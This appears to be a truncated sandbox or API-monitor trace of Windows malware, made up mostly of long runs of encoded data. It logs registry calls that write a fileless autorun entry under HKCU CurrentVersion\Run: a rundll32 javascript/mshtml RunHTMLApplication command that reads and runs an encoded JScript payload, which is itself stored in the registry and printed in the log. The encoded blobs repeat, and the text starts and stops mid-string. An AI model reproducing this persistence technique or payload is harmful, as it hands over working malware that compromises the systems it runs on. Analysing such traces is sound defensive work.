qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0102.241] RegCloseKey (hKey=0x240) returned 0x0 [0102.242] Sleep (dwMilliseconds=0x1388) [0107.247] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0xafbc4, lpdwDisposition=0x0 | out: phkResult=0xafbc4*=0x240, lpdwDisposition=0x0) returned 0x0 [0107.247] NtSetValueKey (in: KeyHandle=0x240, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0107.248] RegSetValueExW (in: hKey=0x240, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef54 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 